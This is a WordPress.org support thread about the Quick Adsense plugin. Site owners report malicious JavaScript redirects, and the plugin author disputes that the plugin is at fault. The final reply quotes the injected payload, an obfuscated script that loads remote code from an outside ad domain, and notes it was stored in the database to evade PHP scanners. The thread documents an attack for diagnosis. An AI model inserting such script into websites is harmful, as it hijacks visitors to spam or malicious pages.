Title: Plugin installed without authorisation
Last modified: August 5, 2022

---

# Plugin installed without authorisation

 *  [jeslabbert](https://wordpress.org/support/users/jeslabbert/)
 * (@jeslabbert)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/)
 * This plugin has been automatically installed on a website we administer twice
   now and both times it has been used to run a js exploit that redirects users 
   away.
 * This is a dangerous plugin

Viewing 7 replies - 1 through 7 (of 7 total)

 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15890043)
 * Please secure your website, what you are saying is technically impossible to 
   do for a plugin.
 *  Thread Starter [jeslabbert](https://wordpress.org/support/users/jeslabbert/)
 * (@jeslabbert)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15890124)
 * I am securing it. The only thing that breaks my website on the front end is a
   javascript injection from your plugin. I have blocked this plugin from being 
   installed, but it is vulnerable to exploits.
 *  [vcompdev](https://wordpress.org/support/users/vcompdev/)
 * (@vcompdev)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15891782)
 * I have been having the same issue for a few days now. When someone goes to my
   site, it redirects them to spam ads. I just changed my passwords so let’s see
   if that works.
 * I keep deleting the plugin and it keeps re-installing itself.
 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 10 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-15891840)
 * What you guys are claiming is technically impossible, A plugin cannot install
   by itself. It seems your sites have been hacked and someone is installing the
   plugin on your sites to insert their ads. Its not possible for any plugin to 
   install by itself unless there is some code already on the site which can do 
   it.
 * Also Quick Adsense had a full security audit just a couple months back from the
   WordPress plugin team and the plugin adhers to all WordPress plugin guidelines.
   Anyone is welcome to security audit the code. These are unfortunate allegations
   which has nothing to do with any plugin.
 *  [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * (@tonnick0033)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16000741)
 * same issue here. seems that this plugin is too easy to configure with sql injection
   to insert malicious js
 *  Plugin Author [Namith Jawahar](https://wordpress.org/support/users/namithjawahar/)
 * (@namithjawahar)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16000787)
 * Can you help me with where the malicious code was inserted?
    Header / Footer /
   In one of the Ad Slots?
 * This is really weird in the sense if someone malicious has elevated themselves
   with the permission to install plugins why would they alter a plugin code to 
   insert their ads instead of directly editing your theme. I am assuming whoever
   is doing this is doing it to prevent detection.
 * Having received three reports about this, I will add a feature to verify the 
   authenticity of the data with a hash in the next version (which probably is the
   first for any plugin) but its more important to actually figure out how someone
   is getting elevated permission to perform this database update.
 *  [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * (@tonnick0033)
 * [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16001301)
 * Code has been inserted in header/footer codes + in “ads posts body” slots. as
   no widget has been added, the code were coming from header one.
    the 3 first 
   slots were feeded + the last one 🙂 just in case we miss it deleting the code
   😀
 * that way, there is no malicious code in php files. this does not hit php scanner.
 * the malicious code gets inside database using your plugin 🙁
 * here is an exemple of code inserted
 *     ```
       "<script type="text/javascript">
       	atOptions = {
       		'key' : '4daf1db77f85db185034cebc94b70b32',
       		'format' : 'iframe',
       		'height' : 600,
       		'width' : 160,
       		'params' : {}
       	};
       	document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://intersectionweigh.com/4daf1db77f85db185034cebc94b70b32/invoke.js"></scr' + 'ipt>');
       </script>"
       ```
   

Viewing 7 replies - 1 through 7 (of 7 total)

The topic ‘Plugin installed without authorisation’ is closed to new replies.

 * ![](https://ps.w.org/quick-adsense/assets/icon-256x256.png?rev=2682075)
 * [Quick Adsense](https://wordpress.org/plugins/quick-adsense/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/quick-adsense/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/quick-adsense/)
 * [Active Topics](https://wordpress.org/support/plugin/quick-adsense/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/quick-adsense/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/quick-adsense/reviews/)

 * 10 replies
 * 4 participants
 * Last reply from: [tonnick0033](https://wordpress.org/support/users/tonnick0033/)
 * Last activity: [3 years, 9 months ago](https://wordpress.org/support/topic/plugin-installed-without-authorisation/#post-16001301)
 * Status: not a support question